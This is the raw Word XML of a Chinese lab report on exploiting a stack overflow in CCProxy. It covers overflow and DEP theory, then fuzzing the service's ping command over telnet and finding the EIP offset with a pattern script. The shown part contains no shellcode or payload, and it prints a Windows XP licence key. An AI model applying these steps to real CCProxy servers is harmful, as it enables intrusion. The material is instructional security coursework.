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F70908" w14:textId="11E9C947" w:rsidR="002030E6" w:rsidRDefault="00621CFE" w:rsidP="00621CFE">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:ind w:left="840" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00621CFE">
        <w:t>CCProxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00621CFE">
        <w:t xml:space="preserve"> 溢出漏洞分析与利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFDFABC" w14:textId="0088D0A6" w:rsidR="00D445A8" w:rsidRDefault="002030E6" w:rsidP="00D445A8">
      <w:pPr>
        <w:ind w:left="1680" w:firstLine="420"/>
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>G</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ithub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址：</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:instrText>HYPERLINK "https://github.com/Zhousongjie/sniffer"</w:instrText>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>Zhousongjie/sniffer (github.com)</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C254DE" w14:textId="005F409F" w:rsidR="00D445A8" w:rsidRDefault="00D445A8" w:rsidP="00D445A8">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BF34F3" w14:textId="0335DA0F" w:rsidR="00D445A8" w:rsidRPr="00D445A8" w:rsidRDefault="00D445A8" w:rsidP="00D445A8">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓冲区溢出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF7E690" w14:textId="77777777" w:rsidR="00D445A8" w:rsidRDefault="00D445A8" w:rsidP="00D445A8">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓冲区是指被程序内部使用或存放用户输入的内存区域，而溢出是指计算机向缓冲区填充数据时超出了缓冲区本身的容量，从而破坏程序的堆栈，造成程序崩溃或使程序转而执行其它指令，以达到攻击的目的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745511BA" w14:textId="77777777" w:rsidR="00D445A8" w:rsidRDefault="00D445A8" w:rsidP="00D445A8">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于堆栈是由内存高地址向内存低地址方向增长，而数组的变量是从内存低地址向高地址方向增长。如果没有对数据的越界进行检查和限制，通过向程序的数组缓冲区写入超出其长度的内容，覆盖堆栈原来的返回地址，就会造成缓冲区溢出，从而破坏程序的堆栈。如果构造特殊的注入向量覆盖返回地址，使程序转而执行恶意代码，就达到攻击的目的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F24D6BD" w14:textId="2ED5B73D" w:rsidR="00D445A8" w:rsidRDefault="00D445A8" w:rsidP="00D445A8">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>栈溢出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041712BB" w14:textId="77777777" w:rsidR="00D445A8" w:rsidRDefault="00D445A8" w:rsidP="00D445A8">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行时内存一段连续的区域，用来保存函数运行时的状态信息，包括函数参数与局部变量等</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04363960" w14:textId="47F6B817" w:rsidR="00D445A8" w:rsidRDefault="00D445A8" w:rsidP="00D445A8">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在内存中从高地址向低地址生长，所以栈顶对应的内存地址在压栈时变小，退栈时变大</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F43CD24" w14:textId="5F012B16" w:rsidR="00D445A8" w:rsidRDefault="00D445A8" w:rsidP="00D445A8">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数状态主要涉及三个寄存器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5721AE47" w14:textId="77777777" w:rsidR="00D445A8" w:rsidRDefault="00D445A8" w:rsidP="00D445A8">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ebp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 存储当前执行函数的基地址，在函数运行时不变，常用来索引确定函数参数或局部变量的位置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4227C8B0" w14:textId="77777777" w:rsidR="00D445A8" w:rsidRDefault="00D445A8" w:rsidP="00D445A8">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 存储函数调用栈的栈顶地址，在压栈和退栈时发生变化。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4ADB30" w14:textId="77777777" w:rsidR="00D445A8" w:rsidRDefault="00D445A8" w:rsidP="00D445A8">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 存储即将执行的程序指令的地址，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cpu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 依照 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 的存储内容读取指令并执行，然后</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 自动指向下一条指令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58023177" w14:textId="36C8B73F" w:rsidR="00D445A8" w:rsidRDefault="00D445A8" w:rsidP="00D445A8">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据执行保护</w:t>
      </w:r>
      <w:r>
        <w:t>DEP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673084C2" w14:textId="78BB3AC2" w:rsidR="00D445A8" w:rsidRDefault="00D445A8" w:rsidP="00D445A8">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.3.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原因</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D53C54" w14:textId="668ECA57" w:rsidR="00D445A8" w:rsidRDefault="00D445A8" w:rsidP="00D445A8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在冯·诺依曼体系中不区分代码和数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54780F79" w14:textId="06CC5DE1" w:rsidR="00D445A8" w:rsidRDefault="00D445A8" w:rsidP="00D445A8">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.3.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基本原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354E43F7" w14:textId="693A40A6" w:rsidR="00D445A8" w:rsidRDefault="00D445A8" w:rsidP="00D445A8">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将数据所在内存页标识为不可执行，阻止数据页执行代码。当程序溢出成功尝试在数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>页面上执行指令，此时</w:t>
      </w:r>
      <w:r>
        <w:t>CPU就会抛出异常，而不是去执行恶意指令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E54409C" w14:textId="3F349242" w:rsidR="00D445A8" w:rsidRDefault="00D445A8" w:rsidP="00D445A8">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.3.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缺点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDAD0D4" w14:textId="6D9C0303" w:rsidR="00D445A8" w:rsidRDefault="00D445A8" w:rsidP="00D445A8">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>硬件</w:t>
      </w:r>
      <w:r>
        <w:t>DEP需要CPU的支持，但并不是所有的CPU都提供了硬件DEP的支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于兼容性的原因</w:t>
      </w:r>
      <w:r>
        <w:t>Windows不能对所有进程开启DEP保护，否则可能会出现异常。例如一些第三方的插件DLL，由于无法确认其是否支持DEP，对涉及这些DLL的程序不敢贸然开启DEP保护</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088A4437" w14:textId="152C7B9C" w:rsidR="00D445A8" w:rsidRDefault="00D445A8" w:rsidP="00D445A8">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:t>DEP工作在最主要的两种状态</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>optin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>和optout下时，DEP是可以被动态关闭和开启的，这就说明操作系统提供了某些API函数来控制DEP的状态，而API的调用没有任何限制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76304D7C" w14:textId="61164C52" w:rsidR="00621CFE" w:rsidRDefault="00D445A8" w:rsidP="00621CFE">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00621CFE">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00621CFE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>准备工作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255AB307" w14:textId="47D54010" w:rsidR="00621CFE" w:rsidRDefault="00621CFE" w:rsidP="00621CFE">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>VM虚拟机，存在漏洞的windows版本镜像，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ccproxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00D445A8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>windbg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>等调试工具，python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6783BE57" w14:textId="45D7E6B4" w:rsidR="00833502" w:rsidRDefault="008C0FD5" w:rsidP="00621CFE">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> sp2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密钥：</w:t>
      </w:r>
      <w:r>
        <w:t>BB96V-433XK-GM9WR-KXCDJ-4HTQW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD51FEF" w14:textId="77777777" w:rsidR="008C0FD5" w:rsidRDefault="008C0FD5" w:rsidP="00621CFE">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2392DF99" w14:textId="14F65F91" w:rsidR="00621CFE" w:rsidRDefault="00D445A8" w:rsidP="00621CFE">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00621CFE">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00621CFE">
        <w:t>ccproxy攻击流程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F42CF1" w14:textId="2397B1E6" w:rsidR="00621CFE" w:rsidRDefault="00A6662E" w:rsidP="00621CFE">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00621CFE">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00621CFE">
        <w:t>1启动</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00621CFE">
        <w:t>ccproxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00621CFE">
        <w:t>软件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326CC935" w14:textId="77777777" w:rsidR="00621CFE" w:rsidRPr="00621CFE" w:rsidRDefault="00621CFE" w:rsidP="00621CFE"/>
    <w:p w14:paraId="126FBDD1" w14:textId="697BD420" w:rsidR="00621CFE" w:rsidRDefault="00AA10CA" w:rsidP="00621CFE">
      <w:r w:rsidRPr="00AA10CA">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E85CC01" wp14:editId="04AC1EB4">
            <wp:extent cx="5274310" cy="2736215"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="152765814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65814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1A572" w14:textId="7A6DBBAB" w:rsidR="00621CFE" w:rsidRDefault="00A6662E" w:rsidP="00621CFE">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00621CFE">
        <w:t>.2</w:t>
      </w:r>
      <w:r w:rsidR="00621CFE">
        <w:t xml:space="preserve"> 用调试软件将</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00621CFE">
        <w:t>ccproxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00621CFE">
        <w:t>挂起</w:t>
      </w:r>
      <w:r w:rsidR="00DB57DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00DB57DE">
        <w:t>测试是否有漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542AC8C7" w14:textId="77777777" w:rsidR="00DB57DE" w:rsidRDefault="00DB57DE" w:rsidP="00DB57DE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看目标机器的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，并使用telnet命令连接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08656AD7" w14:textId="77777777" w:rsidR="00DB57DE" w:rsidRDefault="00DB57DE" w:rsidP="00DB57DE"/>
    <w:p w14:paraId="35C066D7" w14:textId="16C3EA26" w:rsidR="00DB57DE" w:rsidRDefault="00DB57DE" w:rsidP="00DB57DE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接成功</w:t>
      </w:r>
      <w:r w:rsidR="009D1FC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31360A71" w14:textId="77777777" w:rsidR="00DB57DE" w:rsidRDefault="00DB57DE" w:rsidP="00DB57DE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ping AAAA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013B5DB5" w14:textId="6879B463" w:rsidR="00DB57DE" w:rsidRDefault="00DB57DE" w:rsidP="00DB57DE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ping Ax1000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4D59D4" w14:textId="6D22615E" w:rsidR="00DB57DE" w:rsidRDefault="00DB57DE" w:rsidP="00DB57DE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ping Ax2000 </w:t>
      </w:r>
      <w:r w:rsidR="00A27AA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在调试工具中可以看到，</w:t>
      </w:r>
      <w:r w:rsidR="009D1FC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发生</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>溢出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7C0A1C" w14:textId="77777777" w:rsidR="00DB57DE" w:rsidRDefault="00DB57DE" w:rsidP="00DB57DE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接着在工具的输入框中使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 和 dd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>查看</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>的内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24458C5A" w14:textId="77777777" w:rsidR="00DB57DE" w:rsidRDefault="00DB57DE" w:rsidP="00DB57DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B26231A" w14:textId="77777777" w:rsidR="00DB57DE" w:rsidRDefault="00DB57DE" w:rsidP="00DB57DE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>计算</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>内容的字符在刚刚的2000个字符中的相对位置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC4F68A" w14:textId="77777777" w:rsidR="00621CFE" w:rsidRPr="00DB57DE" w:rsidRDefault="00621CFE" w:rsidP="00621CFE"/>
    <w:p w14:paraId="43238DE1" w14:textId="79A451D8" w:rsidR="00621CFE" w:rsidRDefault="009D1FC2" w:rsidP="00621CFE">
      <w:r w:rsidRPr="009D1FC2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DF64D8A" wp14:editId="39AE9559">
            <wp:extent cx="5274310" cy="2763520"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="132103527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03527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3724E" w14:textId="77777777" w:rsidR="00A27AA3" w:rsidRDefault="00A27AA3" w:rsidP="00621CFE"/>
    <w:p w14:paraId="28225F2D" w14:textId="77777777" w:rsidR="00A27AA3" w:rsidRDefault="00A27AA3" w:rsidP="00A27AA3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>计算返回地址的思路</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A9FD37" w14:textId="77777777" w:rsidR="00A27AA3" w:rsidRDefault="00A27AA3" w:rsidP="00A27AA3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用一串不重复的字符填充缓冲区，然后查看覆盖</w:t>
      </w:r>
      <w:r>
        <w:t>RET的字符串，计算它们在整个字符串中的位置，从而得出缓冲区的大小及RET的偏移</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196405D8" w14:textId="77777777" w:rsidR="00A27AA3" w:rsidRDefault="00A27AA3" w:rsidP="00A27AA3"/>
    <w:p w14:paraId="3B53E77F" w14:textId="533C6A8D" w:rsidR="007E091C" w:rsidRDefault="0014707E" w:rsidP="0014707E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidR="007E091C" w:rsidRPr="007E091C">
        <w:t>patternCreate.pl脚本代码生成2000个不重复的字符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0FF26F" w14:textId="77777777" w:rsidR="00A27AA3" w:rsidRDefault="00A27AA3" w:rsidP="00A27AA3"/>
    <w:p w14:paraId="57D44D49" w14:textId="77777777" w:rsidR="00A27AA3" w:rsidRDefault="00A27AA3" w:rsidP="00A27AA3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成</w:t>
      </w:r>
      <w:r>
        <w:t>2000个模式字符C: \Perl\bin&gt; perl.exe patternCreate.pl 1.txt 2000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191C4F93" w14:textId="75DA799D" w:rsidR="009A7D85" w:rsidRDefault="009A7D85" w:rsidP="00A27AA3">
      <w:r w:rsidRPr="009A7D85">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5978780A" wp14:editId="13F13AC8">
            <wp:extent cx="5274310" cy="1461135"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="96862318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62318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DDFF8" w14:textId="7A88EB77" w:rsidR="006556A2" w:rsidRDefault="006556A2" w:rsidP="00A27AA3">
      <w:r w:rsidRPr="006556A2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71BE3C99" wp14:editId="71D7E36D">
            <wp:extent cx="5274310" cy="599440"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="118053627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53627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5D5DF" w14:textId="77777777" w:rsidR="00A27AA3" w:rsidRDefault="00A27AA3" w:rsidP="00A27AA3">
      <w:r>
        <w:t>ping这2000个模式字符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230A7227" w14:textId="5723C9E8" w:rsidR="00A27AA3" w:rsidRDefault="00415185" w:rsidP="00A27AA3">
      <w:r w:rsidRPr="00415185">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1305BA34" wp14:editId="417311A8">
            <wp:extent cx="5274310" cy="2138045"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="15340981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09811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A071A" w14:textId="77777777" w:rsidR="00A27AA3" w:rsidRDefault="00A27AA3" w:rsidP="00A27AA3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>计算</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>的值在整个长为2000的字符串中的偏移</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FE35B8" w14:textId="77777777" w:rsidR="00415185" w:rsidRDefault="00415185" w:rsidP="00A27AA3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
